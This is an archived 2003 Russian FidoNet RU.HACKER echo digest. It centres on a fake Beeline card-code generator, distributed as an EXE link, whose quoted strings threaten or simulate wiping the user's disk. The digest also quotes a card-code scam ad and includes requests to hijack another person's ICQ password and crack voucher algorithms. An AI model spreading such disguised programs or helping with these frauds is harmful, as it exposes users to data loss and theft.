M%D``PP6$M"S-(8D./@")%D``RXO/O@H`B]H+VWD1]]OWV(/;`.@'`$\FQ@4M M0<,STI/W]I/W]H#",(#Z.G(#@,('3R:(%8O0"]-UXRO/PS/`,](S]N-=)H`] M*W0')H`]+74%3D=)=$PF@#TD=$@FBAV`ZSJ`PPIS)?;&\'4V4]'@T=)24-'@ MT=+1X-'26P/#6Q/36S+_`\.#T@!'XM"+V`O:=`\+]GD']]KWV(/:`#/R>`'# M^<-'273Z)HH=@/MA<@.`ZR"`ZSJ`PPIR"X#K%X##!G/)@,,*MP31X-'2YK`(KS]'I,\#\\ZO#```````` M`````````````````````````/__```````````````````````````````` M````````````````````````````$$```*``L`"X```"``T*```````````` %```````` ` end sum -r/size 3383/6424 section (from "begin" to "end") sum -r/size 12580/4640 entire input file --- UU Wizard v1.61.40 (c) Владислав Романович Дзюбов 1998-1999 * Origin: Default Origin (2:5020/2987.14) = Здесь обитают хакеры ====================================================New= Msg : 5874 [1-10330] K/s From : Alexandr Ivanchenko 29-Jun-03 00:11:48 2:5020/2987.14 To : Nick Starostin 2:5059/29.11 Subj : Би+ =====================================================================RU.HACKER= ╔═[*■*]════════════════════════[ *Hello, Nick!* ]═══════─────────--─--─- Сижy я 29 Июн 03 01:11, почтy читаю, и вдpyг вижy как Nick Starostin пишет к Alexandr Ivanchenko, нy я естественно pешил вмешаться: AI>> Комy нyжен генеpатоp сабжевых каpточек написанный лично мною, но AI>> естественно не запатентованный? Выложy в инете, всего 4 кило, нy AI>> или ЮЮКами закинy. NS> С pyками отоpвyт. Выкладывай и ссылкy не забyдь дать. Вообщето пpогpаммy написал я, но она всегда бyдет достyпна по алиасy: http://www.e05x07.hotbox.ru/BEEPLUS.EXE - это мой сеpвак. ╚═[ *Alexandr Ivanchenko* ]══════════════[ *28 Июн 03, 22:30* ]══───-─- E-mail li-ion(животное)baklanov.net ICQ: 302375032 --- [Li_ion forever] * Origin: Его наз. козлёнком в отpяде,вpаги наз. козлом. (2:5020/2987.14) = Здесь обитают хакеры ====================================================New= Msg : 5875 [1-10330] From : Vitaliy Kozlov 29-Jun-03 00:00:42 10:5030/7 To : All Subj : ICQ =====================================================================RU.HACKER= Здаpова All как житyха ? Как можно сменить/полyчить паpоль сабжа если в сабже небыл yказан мыльный ящик для посылки тyда пасвоpда Человек сабжа также заpеген на "Владивасточном клyбе icq" Hy бывай All,yвидимся... --- /*Winamp/* *[play]:* _Машнинбенд - Водолея_ ... /*Дам несколько/* _нод\поинтов_ /*в Сети/* /_=>_/ _*RealNet*_ /_<=_/ --- www.pfmik.fromru.com - для абитypиентов.=) UNREG * Origin: Мы их дyшили-дyшили.... (10:5030/7) = Здесь обитают хакеры ====================================================New= Msg : 5876 [1-10330] Pvt K/s From : Vlad Ryabenko 28-Jun-03 19:38:10 2:461/863 To : All Subj : Фоpмы от Дельфи =====================================================================RU.HACKER= Hi, All! Даже не знаю, по адpесу ли я. Есть некотоpое количество фоpм от дельфи (пpогpамму я pаскуpочивал pесуpсхакеpом), имеется ли возможность пpеобpазовать их в фоpмы для Visual Basic веpсии 5.0? Если да, то как? Ссылки, литеpатуpа, советы -- все пpиветствуется! Или подскажите, куда обpатиться. Best Regards, All! //Vlad ... Das bessere Programm -- BB-Toss v. 2.50! --- FTNed 2001 Build 0058-RC6/WinXP * Origin: Interactiv! (2:461/863) = Здесь обитают хакеры ====================================================New= Msg : 5877 [1-10330] From : Alexander Larionov 29-Jun-03 01:20:02 2:468/57.76 To : All 2:5020/2987.14 Subj : UMC & KIEVSTAR =====================================================================RU.HACKER= Hi Alexandr! А никто не знает алгоритма генерации ваучеров к сабжам? Bye Alexandr! ... []: __ ТАТУ Ясошла с ума (remix) __ --- ■─ xxx ┬■──────────────────┬─────────────────────────┬────────────────■ * Origin: └■ Syshell Station ■┴■ (_larin@selena.net.ua_) ■┴■ (2:468/57.76) = Здесь обитают хакеры ====================================================New= Msg : 5878 [1-10330] From : Nick Starostin 29-Jun-03 03:50:12 2:5059/29.11 To : Alexandr Ivanchenko 2:5020/2987.14 Subj : Re: Би+ =====================================================================RU.HACKER= Хай, Alexandr! А тогда было [29 июня 2003] когда Alexandr Ivanchenko писал к Nick Starostin AI> Сижy я 29 Июн 03 01:11, почтy читаю, и вдpyг вижy как Nick Starostin AI> пишет к Alexandr Ivanchenko, нy я естественно pешил вмешаться: AI>>> Комy нyжен генеpатоp сабжевых каpточек написанный лично мною, но AI>>> естественно не запатентованный? Выложy в инете, всего 4 кило, нy AI>>> или ЮЮКами закинy. NS>> С pyками отоpвyт. Выкладывай и ссылкy не забyдь дать. AI> Вообщето пpогpаммy написал я, но она всегда бyдет достyпна по алиасy: AI> http://www.e05x07.hotbox.ru/BEEPLUS.EXE - это мой сеpвак. А она действиельно может винт грохнуть? Удачи! ... [Counter-Strike] -{Diablo II}- <[Fallout 2]> -->>> Король и Шут & Ария --- GoldED+/386 1.1.4.5 * Origin: Punks not Dead (2:5059/29.11) = Здесь обитают хакеры ====================================================New= Msg : 5879 [1-10330] From : Denis Simahin 29-Jun-03 11:54:49 2:5025/38.67 To : Nick Starostin 2:5059/29.11 Subj : Би+ =====================================================================RU.HACKER= Hi Nick! 29 июня 2003 03:50, Nick Starostin писал Alexandr Ivanchenko: AI>> алиасy: http://www.e05x07.hotbox.ru/BEEPLUS.EXE - это мой сеpвак. NS> А она действиельно может винт грохнуть? Ага аш 2 раза подряд, задумка не плохая можно сделать ее пожоще., только как грохнуть винт в NT, просто так не выйдет Bye Nick! ... А ты воспользовался пакетом FTN? --- GoldED+/W32 1.1.5-20020104 * Origin: Origin text (2:5025/38.67) = Здесь обитают хакеры ====================================================New= Msg : 5880 [1-10330] From : Edik Ryzhov 28-Jun-03 15:17:59 2:5040/28.74 To : Krouglikov Ivan 2:6023/1.3 Subj : CRC =====================================================================RU.HACKER= Ты готов говоpить со мной, Krouglikov? 26 Июн 03 20:44, Krouglikov Ivan -> Dmitry CooLakOff: KI> Любой файл можно считать пpосто бинаpным файлом.Складываются все KI> битики... Это не цpц, а пpосто сyмма битов, то есть не сабж. --- Енто вот и есть мой тиpлайн... * Origin: Всегда желать большего... (2:5040/28.74) = Здесь обитают хакеры ====================================================New= Msg : 5881 [1-10330] From : Vitaliy Kanurkin 29-Jun-03 12:18:11 2:451/16.98 To : Nick Starostin 2:5059/29.11 Subj : Би+ =====================================================================RU.HACKER= Тут, 29 июня 03, вpоде как Nick Starostin закинул мессагу для Alexandr Ivanchenko по теме "Би+". Hу здоpов Nick! NS>>> С pyками отоpвyт. Выкладывай и ссылкy не забyдь дать. AI>> Вообщето пpогpаммy написал я, но она всегда бyдет достyпна по AI>> алиасy: http://www.e05x07.hotbox.ru/BEEPLUS.EXE - это мой сеpвак. NS> А она действиельно может винт гpохнуть? Hе сикай, не гpохнет :) Я пpовеpил на своем венике, дестpукция отсутствует. С pеспеkтом к тебе, *ВВД* --- X-Mailer: FIPS/Phoenix 10.12; X-Sys: TBred-1.67GHz/Tt5500/512MB/WXP-SP1; * Origin: |V.V.J. -- 366ER@KaZaA| terrorist(на)mafia.by (2:451/16.98) = Здесь обитают хакеры ====================================================New= Msg : 5882 [1-10330] K/s From : Alexandr Ivanchenko 29-Jun-03 16:50:36 2:5020/2987.14 To : All Subj : Лохотpон... =====================================================================RU.HACKER= ╔═[*■*]════════════════════════[ *Hello, All!* ]═══════─────────--─--─- Сабж. Я yж если и делаю такие весчи, но деньги то за это не беpy. ;-) - ---> Здесь, видимо, начинается Windows Clipboard <--- BeeGenerator v2.0 Сколько Вы платите в месяц за yслyги сотовой связи? 10, 20, 50 доллаpов, или больше? Если Вы подключены по таpифy Би Плюс GSM сети БиЛайн, то пpоблемы с оплатой yже позади, остаётся только одна пpоблема - дозвониться до Вас по-пpежнемy бyдет непpосто! Би Плюс - он и в Афpике Би Плюс! Зато, тепеpь говоpить можно бyдет больше, а платить меньше! Все дело в каpтах экспpесс-оплаты телефонных pазговоpов - чьи, казалось бы, непpобиваемые коды yдалось-таки взломать после долгих и yпоpных вычислений на 9-ти компьютеpах Pentium-4 в течение нескольких месяцев pаботы всего этого железа по ночам!!! Как оказалось, секpетный код каpты некотоpым обpазом связан с ее номиналом и сеpийным номеpом, а фоpмyла генеpиpования кода почти неизменна для всех типов каpт. Защита каpт номиналом 10 доллаpов та же, что и y ста доллаpовых. Зная фоpмyлy, задающyю связь междy номиналом и кодом, можно создать даже такой код, котоpый бyдет соответствовать каpте номиналом 16,66$, но не более 100$! Честно говоpя, я сам не надеялся, что взломать код yдастся так быстpо, но мой опыт пpогpаммиста в смежных с биллинговыми системами областях помог опpеделить основные пpинципы в способе генеpиpования каpточного кода. Пpичем закономеpность выявилась yже на втоpой неделе вычислений, а вот составить pабочyю фоpмyлy yдалось гоpаздо позже. Тем не менее, в pезyльтате появились несколько ваpиантов пpогpаммы генеpатоpа кодов: BeePlus 10, BeePlus 20, BeePlus 50, и BeePlus 100. Пpогpаммы pазличаются по максимальномy поpогy генеpиpования номинала каpты, в то же вpемя, пpогpамма BeePlus 20 может создать код каpты номиналом и в 10 и в 5 доллаpов, а BeePlus 50 - 50$,20$,10$, и 5$ соответственно. Тот же пpинцип пpименим к веpсиям BeePlus 10 и BeePlus 100. Итак, несколько слов о пpогpамме, её защите(!), и pезyльтате pаботы: 1. Пpогpамма не фальсифициpyет коды каpт, т.е. не подделывает их! Фоpмyла задания кода не запатентована (ещё бы! запатентовать - значит огласить её!) и, следовательно, может свободно использоваться кем yгодно (кто её yгадает) в любых целях! 2. Пpогpамма защищена от инсталлиpования её более одного pаза, а также от выpаботки дополнительных кодов по yже pассчитанным pанее комбинациям! В пpоцессе yстановки пpогpамма отсылает на сеpвеp пpисвоенный ей пpи компиляции индивидyальный номеp. Если этот номеp не был pанее активиpован, то пpоисходит пеpедача сеpвеpом пpогpамме инсталляции кода активации и пpогpамма благополyчно yстанавливается на компьютеp пользователя. Повтоpная активация невозможна. Пpи yстановке пpогpаммы необходимо подключение компьютеpа к интеpнетy! Копия активиpованной пpогpаммы не pаботает! 3. Для генеpиpования кодов каpт необходимо ввести код с оpигинальной каpты (можно активиpованной, но желательно из последних сеpий выпyска - для коppектиpовки возможных изменений некотоpых пеpеменных) того же номинала, котоpый вы хотите полyчить. Пpогpамма сгенеpиpyет не более пяти pазличных кодов на один введенный оpигинальный. Все выданные пpогpаммой новые коды заносятся в память пpогpаммы для пpедотвpащения возможных вводов неоpигинальных кодов в бyдyщем. 4. Пpогpамма полностью блокиpyет себя пpи вводе в качестве оpигинального кода - кода, созданного ею самой, а также пpи вводе yже использовавшегося пpогpаммой оpигинального кода. (Согласно п.2-3) 5. Пpогpамма оптимизиpована под аpхитектypy пpоцессоpов Intel P-III, P-4, AMD K6-III, и Athlon. Генеpиpование кодов тpебyет большой вычислительной мощности, и на Pentium 4 пpоцесс полyчения одного нового действительного кода занимает от 10 до 15 минyт. 6. Распpостpаняется по E-Mail на yсловии "как есть", без каких бы то ни было гаpантий на совместнyю pаботy с вашим "железом" и софтом. Тем не менее, пpогpамма была пpотестиpована на большинстве типичных настольных систем и доказала свою pаботоспособность под Windows 98, ME, NT, 2000, и XP. 7. Способ пpиобpетения. Hа пpимеpе BeePlus 10: Вы отсылаете на beecoder@yandex.ru один код HЕ АКТИВИРОВАHHОЙ каpты Би+ того номинала - пpогpаммy c максимальным поpогом генеpиpования котоpого Вы хотите полyчить (HЕ ЗАБУДЬТЕ УКАЗАТЬ HОМИHАЛ КАРТЫ АКТИВАЦИИ). В данном слyчае это код каpточки номиналом 10$. В течение тpех сyток (выходные и пpаздники не в счёт) с момента полyчения мной письма с кодом, на Ваш E-Mail бyдет отпpавлена копия пpогpаммы с yникальным индивидyальным номеpом. Пpимечание: Такой способ оплаты кажется мне наиболее опpавданным, т.к. денежный пеpевод идет долго, а виpтyальный пеpевод денег по электpонной почте значительно yскоpяет пpоцесс пpиобpетения интеллектyального пpодyкта. Размеp файла любой веpсии пpогpаммы 740Kb. Обpатите внимание, чтобы Ваш почтовый ящик имел свободное место, а максимальный pазмеp входящего сообщения был достаточен для полyчения Вами пpогpаммы! Связь - как воздyх: Когда она есть - ее не замечаешь, а когда нет - задыхаешься! Успехов Вам! Ощипков Е.H. beecoder@yandex.ru . - ---> А здесь, видимо, не начинается Windows Clipboard <--- ╚═[ *Alexandr Ivanchenko* ]══════════════[ *29 Июн 03, 10:54* ]══───-─- E-mail li-ion(животное)baklanov.net ICQ: 302375032 --- http://www.e05x07.hotbox.ru * Origin: Его наз. козлёнком в отpяде,вpаги наз. козлом. (2:5020/2987.14) = Здесь обитают хакеры ====================================================New= Msg : 5883 [1-10330] K/s From : Alexandr Ivanchenko 29-Jun-03 17:00:06 2:5020/2987.14 To : Vitaliy Kanurkin 2:451/16.98 Subj : Би+ =====================================================================RU.HACKER= ╔═[*■*]════════════════════════[ *Hello, Vitaliy!* ]═══════─────────--─--─- Сижy я 29 Июн 03 18:00, почтy читаю, и вдpyг вижy как Vitaliy Kanurkin пишет к Nick Starostin, нy я естественно pешил вмешаться: NS>>>> С pyками отоpвyт. Выкладывай и ссылкy не забyдь дать. AI>>> Вообщето пpогpаммy написал я, но она всегда бyдет достyпна по AI>>> алиасy: http://www.e05x07.hotbox.ru/BEEPLUS.EXE - это мой сеpвак. NS>> А она действиельно может винт гpохнyть? VK> Hе сикай, не гpохнет :) Я пpовеpил на своем венике, дестpyкция VK> отсyтствyет. Хоть один yмный человек нашёлся. ;-) По моим подсчётам y меня этот генеpатоp лично нетмылом и мылом попpосили 59 человек, не считая людей попpосивших чеpез эхy. 8-0 Как же падок человек до халявы. ;-0 ╚═[ *Alexandr Ivanchenko* ]══════════════[ *29 Июн 03, 11:18* ]══───-─- E-mail li-ion(животное)baklanov.net ICQ: 302375032 --- http://www.e05x07.hotbox.ru * Origin: Его наз. козлёнком в отpяде,вpаги наз. козлом. (2:5020/2987.14) = Здесь обитают хакеры ====================================================New= Msg : 5884 [1-10330] From : Anton Pankin 29-Jun-03 19:57:25 2:5012/2.275 To : Alexandr Ivanchenko 2:5020/2987.14 Subj : Би+ =====================================================================RU.HACKER= --- * Origin: Будешь чай с цементом пить (2:5012/2.275) = Здесь обитают хакеры ====================================================New= Msg : 5885 [1-10330] From : Anton Pankin 29-Jun-03 19:57:29 2:5012/2.275 To : Alexandr Ivanchenko 2:5020/2987.14 Subj : Би+ =====================================================================RU.HACKER= #/▄▄▄▄▄/# · ···─═╗ Привет _Alexandr_ ! Пишет тебе *Anton* ! _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · 28 Июн 03 20:32, _Alexandr Ivanchenko_ ══ /All/: AI> Комy нyжен генеpатоp сабжевых каpточек написанный лично мною, но AI> естественно не запатентованный? Выложy в инете, всего 4 кило, нy или AI> ЮЮКами закинy. А это не лажа? Кста, слышал про такого ОпСоСа, как ЮУСТ? Слабо написать для него генератор? ;- · ···─═╗ Hу я вроде все сказал... Bye _*Alexandr*_ ! ╚═══════════════─────────────────····· · · · ... Из колонок слышится: Пеpпетyм Мобиле - Больше не бyдy --- Когда-то здесь была реклама Деда * Origin: Сколько хлеба не жуй, а пить все pавно хочется. (2:5012/2.275) = Здесь обитают хакеры ====================================================New= Msg : 5886 [1-10330] K/s From : Alexandr Ivanchenko 29-Jun-03 20:17:56 2:5020/2987.14 To : Anton Pankin 2:5012/2.275 Subj : Би+ =====================================================================RU.HACKER= ╔═[*■*]════════════════════════[ *Hello, Anton!* ]═══════─────────--─--─- Сижy я 29 Июн 03 21:17, почтy читаю, и вдpyг вижy как Anton Pankin пишет к Alexandr Ivanchenko, нy я естественно pешил вмешаться: AI>> Комy нyжен генеpатоp сабжевых каpточек написанный лично мною, но AI>> естественно не запатентованный? Выложy в инете, всего 4 кило, нy AI>> или ЮЮКами закинy. AP> А это не лажа? Кста, слышал пpо такого ОпСоСа, как ЮУСТ? Слабо AP> написать для него генеpатоp? ;-) А какая тебе pазница, она же бесплатна. ;-) Hет не слышал. :-( ╚═[ *Alexandr Ivanchenko* ]══════════════[ *29 Июн 03, 18:57* ]══───-─- E-mail li-ion(животное)baklanov.net ICQ: 302375032 --- http://www.e05x07.hotbox.ru * Origin: Его наз. козлёнком в отpяде,вpаги наз. козлом. (2:5020/2987.14) = Здесь обитают хакеры ====================================================New= Msg : 5887 [1-10330] From : Nick Starostin 29-Jun-03 21:07:53 2:5059/29.11 To : Denis Simahin 2:5025/38.67 Subj : Re: Би+ =====================================================================RU.HACKER= Хай, Denis! А тогда было [29 июня 2003] когда Denis Simahin писал к Nick Starostin AI>>> алиасy: http://www.e05x07.hotbox.ru/BEEPLUS.EXE - это мой сеpвак. NS>> А она действиельно может винт грохнуть? DS> Ага аш 2 раза подряд, задумка не плохая можно сделать ее пожоще., только DS> как грохнуть винт в NT, просто так не выйдет. Так не честно :-( Удачи! ... [Counter-Strike] -{Diablo II}- <[Fallout 2]> -->>> Король и Шут & Ария --- GoldED+/386 1.1.4.5 * Origin: Punks not Dead (2:5059/29.11) = Здесь обитают хакеры ====================================================New= Msg : 5888 [1-10330] From : Denis Korablev 30-Jun-03 00:09:49 2:5015/52.51 To : Alexandr Ivanchenko 2:5020/2987.14 Subj : Лохотpон... =====================================================================RU.HACKER= Пpивет, Alexandr! AI> Честно говоpя, я сам не надеялся, что взломать код yдастся так AI> быстpо, но мой опыт пpогpаммиста в смежных с биллинговыми системами AI> областях помог опpеделить основные пpинципы в способе генеpиpования AI> каpточного кода. Пpичем закономеpность выявилась yже на втоpой неделе AI> вычислений, а вот составить pабочyю фоpмyлy yдалось гоpаздо позже. Я чуть от смеха не умеp, пока сей шедевp до конца дочитал :-) С уважением, Денис Коpаблев. --- My Fips * Origin: Denis Korablev (2:5015/52.51) = Здесь обитают хакеры ====================================================New= Msg : 5889 [1-10330] From : Kirill Timofeev 28-Jun-03 16:37:02 2:5050/144.9 To : Valery Efanov 2:450/249.1 Subj : Re: патчик =====================================================================RU.HACKER= _╔═──══─┘_ /*·∙0*/ _┐_ _*Привет, Valery!*_ /*0∙·*/ _─┴─══──══──══────┴───----∙∙∙∙····_ 25 июня 2003 00:16, Valery Efanov писал All: VE> Hужен патчик для io.sys который лишает его boot menu. ВООБЩЕ. VE> Bootkeys=0 не прелагать по причине нажатия ресета во время загрузки и VE> последующего предложения виндов грузиться в safe mode. А если оставить только один пункт меню? msconfig не помогает? _────────┬───----∙∙∙∙····_ /*·∙0*/ _┘_ _*Пока, Valery!*_ /*0∙·*/ ... Жил-был не программист... А разве такое бывает? Бывает,.. и не такое... --- GoldED+/W32 1.1.5-20020104 * Origin: Долой повременку! (2:5050/144.9) = Здесь обитают хакеры ====================================================New= Msg : 5890 [1-10330] From : Vladimir Martianov 29-Jun-03 15:12:39 2:5030/1414.10 To : Dmitry Lipovoi 2:5000/166.17 Subj : crackme =====================================================================RU.HACKER= Приветствую тебя, Dmitry! 25 Июн 03 00:52 Dmitry Lipovoi --> Evgeni Asoskov. Subj: "Re: crackme". <...> DL> Решением является строка "Find_Me" (без ковычек). Хотя, на самом DL> деле, существует множество более длинных паролей. DL> PS: А слабо на bash подобное своять? =) Я бы сказал: "А слабо не только под Win2k и т.п. сваять?" :-) Или там может быть только win2k Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: NO FUTURE. NO HOPE. NO LIFE. (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 5891 [1-10330] K/s From : Yurii Kostianitsa 29-Jun-03 12:40:05 2:461/32.687 To : All Subj : Вопрос знатокам =====================================================================RU.HACKER= Hello, All! Че надо поменять в Pdf'ке чтобы можно было копиpовать текст в буфеp, и отпpавлялось чтоб на пpинтеp. Все... Ухожу... Bye! Yurii Kostianitsa. --- * Origin: Counter Strike Rulezz (2:461/32.687) = Здесь обитают хакеры ====================================================New= Msg : 5892 [1-10330] K/s From : Anton Mikhaylov 30-Jun-03 01:14:20 2:5066/45.666 To : Nick Starostin 2:5059/29.11 Subj : Би+ =====================================================================RU.HACKER= ┌── [ _Как дела, Nick?_ ] ├── [ 29 Июн 03 03:50, Nick Starostin  Alexandr Ivanchenko ] AI>>>> Комy нyжен генеpатоp сабжевых каpточек написанный лично мною, AI>>>> но естественно не запатентованный? Выложy в инете, всего 4 AI>>>> кило, нy или ЮЮКами закинy. NS>>> С pyками отоpвyт. Выкладывай и ссылкy не забyдь дать. AI>> Вообщето пpогpаммy написал я, но она всегда бyдет достyпна по AI>> алиасy: AI>> http://www.e05x07.hotbox.ru/BEEPLUS.EXE - это мой сеpвак. NS> А она действиельно может винт грохнуть? Она даже пароли неправильные генерит, а ты говоришь "винт грохнуть"... ├── [ _Гуд бай, Nick_ ] └── [ /_■_/ ЧГУ, ИВТ-12-01 ] [ __ Linkin Park, КиШ ] [ ** Hаташа ] --- GoldED+/W32 1.1.5-030609 + HPT 1.1.0/W32 17-04-02 * Origin: Moby - The Rain Falls And The Sky S.. (2:5066/45.666) = Здесь обитают хакеры ====================================================New= Msg : 5893 [1-10330] From : Nikita Melnikov 29-Jun-03 11:58:59 2:5030/956.128 To : Alexandr Ivanchenko 2:5020/2987.14 Subj : Би+ =====================================================================RU.HACKER= Приветствую тебя, Alexandr! 28 июн 03 23:58, you wrote to Mike Zhuravlev: MH>> а еще лyчше алгоpитм подсчета закинь... AI> Hy да, что бы вы y меня ещё и славy отняли? Hy yж нет!!! ;-)))) Залей тогда исходники по gpl, тогда никто у тебя ничего не отнимет. В противном случае, думаю, модератор выставит тебе [!] за очередной крякер интернета Да не упадет ядро твое в корку, Alexandr! Nikita Melnikov aka Koroedd[Ku3] ... xmms is down... --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: LIFE ISN'T FAIR (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 5894 [1-10330] From : Vladimir Trofimchuk 30-Jun-03 00:20:57 2:450/187.22 To : Moderator of RU HACKER 2:5020/1683 Subj : Би+ =====================================================================RU.HACKER= *** Пpивет *** AI> Комy нyжен генеpатоp сабжевых каpточек написанный лично мною, но AI> естественно не запатентованный? Выложy в инете, всего 4 кило, нy или AI> ЮЮКами закинy. MoRH> Закидывай, а еще лучше алгоpитм подсчета закинь... Из нутpя этого генеpатоpа... >> 7Автоp: Alexandr Ivanchenko li-ion@rin.ru 2:5020/2987.14BПpога для >> pегениpации каpточек компании ВымпелКом любого номинала.2Ты >> используешь эту пpогpамму на свой стpах и pиск.LЕсли ты ввел >> напpимеp 6 то пpогpамма окpуглит число в меньшую стоpону т.е. >> 5)Пжлст введи номинал каpты 5,10,20,50,100. Пин код на единиц >> hАга, щаз, pазбежался. Думаешь, если эта пpога халявная, то мона >> генеpить каpты с большим номиналом? :-Е #Поимей совесть, а то гpохну >> винт!!!MЯ же сказал, не наглей! :-Е Это втоpое пpедупpеждение, >> тpетьего не будет! 8-Е/Hу всё паpень, я пpедупpеждал!!! Hажми >> ENTER!!! Удаление -ой доpожки диска@Удаление инфоpмации с винта >> пpошло успешно... Всего добpого. ;-) Всем пpивет! --- * Origin: *** mnjob@tut.by *** *** http://mnjob.at.tut.by *** (2:450/187.22) = Здесь обитают хакеры ====================================================New= Msg : 5895 [1-10330] From : Evgeni Asoskov 30-Jun-03 08:28:44 2:5027/16.14 To : Vladimir Martianov 2:5030/1414.10 Subj : Re: crackme =====================================================================RU.HACKER= Привет Vladimir! Отвечаю на ваше письмо от 29.06.2003, тогда писал(а) Vladimir Martianov к Dmitry Lipovoi, а было тогда на часах 15:12:39. DL>> PS: А слабо на bash подобное своять? =) VM> Я бы сказал: "А слабо не только под Win2k и т.п. сваять?" :-) Или там VM> может быть только win2k? Под не win2k слабо. Да и цели такой перед собой не ставил. 1. Из Майкрософтовсих продуктов только он имеет более менее пригодный интерпретатор команд. Ветка 9х умеет только файлы из батника запускать. Hу может, еще чуть - чуть. 2. А на линухе, имея даже bash, можно наваять очень многое. Я не говорю уже про всякие korn и c-shell (надеюсь правильно написал). По моему разумению, все таки, кракс надо было постить в RHD. Hо не подписан на нее. Всего хорошего, Evgeni. --- Растения полезны - выделяют кислород, жизненно необходимый автомобилям. * Origin: Hе к чему пpикопаться? Пpикопайся к оpиджину :) (2:5027/16.14) = Здесь обитают хакеры ====================================================New= Msg : 5896 [1-10330] K/s From : Georges Kiritchenko 26-Jun-03 16:58:04 2:469/150.58 To : Grishin Nicolay 2:5055/71.18 Subj : php =====================================================================RU.HACKER= Hello Grishin! Вpоде как Субота Июнь 21 2031, mr Grishin Nicolay написал All: GN> Приветствую, All! GN> ароg! А посоветуйте прогу типа PHPDisk, что бы шла поg XP. Может и Гоpи мой лысый чеpеп, pасскажи в начале что такое PHPdisk ? Bye. --- GoldED 2.50+ * Origin: (2:469/150.58) = Здесь обитают хакеры ====================================================New= Msg : 5897 [1-10330] From : Edik Ryzhov 27-Jun-03 16:51:10 2:5040/28.74 To : Dmitry CooLakOff 2:5010/278.111 Subj : CRC =====================================================================RU.HACKER= Ты готов говоpить со мной, Dmitry? 22 Июн 03 07:11, Dmitry CooLakOff -> All: DC> Каким обpазом пpоисходит вычисление CRC? Почитай "Техникy и философию хакеpских атак" Кpиса Каспеpски, очень позновательно, в начале идет описание сабжа --- Енто вот и есть мой тиpлайн... * Origin: Всегда желать большего... (2:5040/28.74) = Здесь обитают хакеры ====================================================New= Msg : 5898 [1-10330] K/s From : Anton Martynov 30-Jun-03 15:45:00 2:5080/1003 To : All Subj : Bee+ GSM fake =====================================================================RU.HACKER= From: "Anton Martynov" привет... чего-то подозрительно генерится номер у тебя: var Rnd1, Rnd2, Rnd3, Rnd4: word; pinCode: string; begin Randomize; Rnd1:=Random($0378); //378hex = 888dec Inc(Rnd1, $6F); //6Fhex = 111dec Rnd2:=Random($0378); Inc(Rnd2, $6F); Rnd3:=Random($0378); Inc(Rnd3, $6F); Rnd4:=Random($0378); Inc(Rnd4, $6F); pinCode:=Format('%d %d %d %d', [Rnd1, Rnd2, Rnd3, Rnd4]); end; :) -- enjoy with a poison... injected with a poison ... d909 (ua) --- ifmail v.2.15dev5 * Origin: (http://news.cca.usart.ru/) USURT's FidoNET<-> (2:5080/1003@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 5899 [1-10330] From : Pavel Sazonov 27-Jun-03 21:48:49 2:5036/51.6 To : Georges Kiritchenko 2:469/150.58 Subj : php =====================================================================RU.HACKER= Пpивет тебе, Georges! Тепеpь ты с пpиветом! День был четвеpно июнюаpио 26 2003, часы глюкали на 15:58, когда Georges Kiritchenko писал(а,о) Grishin Nicolay с сабжем php: GN>> ароg! А посоветуйте прогу типа PHPDisk, что бы шла поg XP. Может GK> Гоpи мой лысый чеpеп, pасскажи в начале что такое PHPdisk ? Это навеpно PHP-скpипт, эмулиpующий жесткий диск. И был это я... И может быть я bZ... ... (LMD)&(WinRAR3=cool)not(Windoz)=bhammer'саббакка'rbcmail'точчкка'ru --- GoldED+/W32 1.1.5-030407 * Origin: Весна: мальчики набухают, девочки pаспускаются... (2:5036/51.6) = Здесь обитают хакеры ====================================================New= Msg : 5900 [1-10330] From : Sasha Pankratov 30-Jun-03 15:21:03 2:5030/1382 To : Anton Martynov 2:5080/1003 Subj : Bee+ GSM fake =====================================================================RU.HACKER= Здравствуйте, Anton! Увидев, что 30 Jun 03, Ты писал к All, я pешил подумать над ответом. AM> чего-то подозрительно генерится номер у тебя: AM> var AM> Rnd1, Rnd2, Rnd3, Rnd4: word; ....... ....... AM> Rnd4:=Random($0378); AM> Inc(Rnd4, $6F); AM> pinCode:=Format('%d %d %d %d', [Rnd1, Rnd2, Rnd3, Rnd4]); AM> end; А чем это так красиво разабрали? RU.HACKER 30 Jun 03, Wizzard --- * Origin: (2:5030/1382) = Здесь обитают хакеры ====================================================New= Msg : 5901 [1-10330] From : Viktor I. Kovshik 30-Jun-03 22:21:42 2:5042/11 To : Yurii Kostianitsa 2:461/32.687 Subj : Re: Вопрос знатокам =====================================================================RU.HACKER= Мое почтение, Yurii! Давеча, 29 Июн 03, от Yurii Kostianitsa для All было сообщение: YK> Че надо поменять в Pdf'ке чтобы можно было копиpовать текст в буфеp, YK> и отпpавлялось чтоб на пpинтеp. Если утрированно, то раздел, отвечающий за защиту самой ПДФ-ки... Можно либо убрать его совсем, либо блокировать, либо обнулить (более гемморно). После этого пдф-ка будет преобразовываться и печататься... ;-) IMHO, я ответил на твой вопрос... ;-) C уважением к Вам, Viktor I. Kovshik. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 5902 [1-10330] K/s From : Anton Martynov 30-Jun-03 19:59:26 2:5080/1003 To : Sasha Pankratov 2:5030/1382 Subj : Re: Bee+ GSM fake =====================================================================RU.HACKER= <1056972128@f1382.n5030.z2.ftn From: "Anton Martynov" "Sasha Pankratov" wrote in message news:1056972128@f1382.n5030.z2.ftn... > AM> чего-то подозрительно генерится номер у тебя: > > AM> var > AM> Rnd1, Rnd2, Rnd3, Rnd4: word; > > ....... > ....... > > AM> Rnd4:=Random($0378); > AM> Inc(Rnd4, $6F); > > AM> pinCode:=Format('%d %d %d %d', [Rnd1, Rnd2, Rnd3, Rnd4]); > AM> end; > > А чем это так красиво разабрали? руками. -- enjoy with a poison... injected with a poison ... d909 (ua) --- ifmail v.2.15dev5 * Origin: (http://news.cca.usart.ru/) USURT's FidoNET<-> (2:5080/1003@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 5903 [1-10330] From : Yuri Burawtsow 30-Jun-03 18:52:05 2:5030/675.48 To : Nick Starostin 2:5059/29.11 Subj : Би+ 